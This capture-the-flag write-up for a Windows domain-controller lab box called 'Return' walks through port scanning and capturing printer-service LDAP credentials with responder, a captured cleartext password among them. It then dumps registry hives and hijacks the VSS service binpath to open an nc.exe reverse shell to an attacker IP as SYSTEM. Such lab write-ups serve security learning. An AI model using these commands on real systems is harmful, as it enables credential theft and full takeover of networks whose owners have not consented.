Return
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 5000 10.129.95.241
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 02:24 EDT
Nmap scan report for 10.129.95.241
Host is up (0.0073s latency).
Not shown: 65512 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49678/tcp open unknown
49681/tcp open unknown
49698/tcp open unknown
SMB Enum
enum4linux
returned nothong of interest with both null and guest credentials.
LDAP
ldapsearch
returns nothing because we have no credentials.
HTTP -> Printer Creds
There is a HTTP port open, and when viewed, it shows a Printer Admin Panel:

When we view the settings, this is what we see:

This looks poisanable since we can control the server address. As such, I started responder
.
$ sudo responder -I tun0
LDAP] Cleartext Client : 10.129.95.241
[LDAP] Cleartext Username : return\svc-printer
[LDAP] Cleartext Password : 1edFg43012!!
We now have some credentials. We can use these to login with evil-winrm
.

We can grab the user flag.
Privilege Escalation
SeBackupPrivilege Fail
When we check our privileges, we see that we have a lot:
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
With this, we can save the system
and sam
files, then dump the hashes with secretsdump.py
.
reg save hklm\sam c:\users\svc-printer\sam
reg save hklm\system c:\users\svc-printer\system
download sam
download system
Afterwards, we can dump hashes:

However, when trying to pass the hash, it seems that this doesn't work.
Services Exploit
When we check which groups we are part of in the machine, we see that svc-printer
is part of Server Operators.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2021 1:15:13 AM
Password expires Never
Password changeable 5/27/2021 1:15:13 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/26/2021 1:39:29 AM
Logon hours allowed All
Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Global Group memberships *Domain Users
The command completed successfully.
We can also check the services running with services
.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc
Since we have privileges over some of the services, we can follow this article online to execute a reverse shell via nc.exe
as SYSTEM
.
However, it seems that although we have privileges over these services, we cannot restart them for some reason. So we need to find a service that is currently stopped, then change its configuration and start it.
Again, we fail in this aspect because we don't have access to the Service Control Manager to view what we can control. So in this case, I used a writeup and saw that they used the VSS service to do the exploit.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe query VSS
SERVICE_NAME: VSS
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
I wasn't too sure how they got to using this. Anyways, we can configure it like so:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VSS binpath="C:\Windows\system32\cmd.exe /c C:\users\svc-printer\documents\nc.exe -e cmd.exe 10.10.14.13 4444"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VSS
This would create a reverse shell on our listener port:

Last updated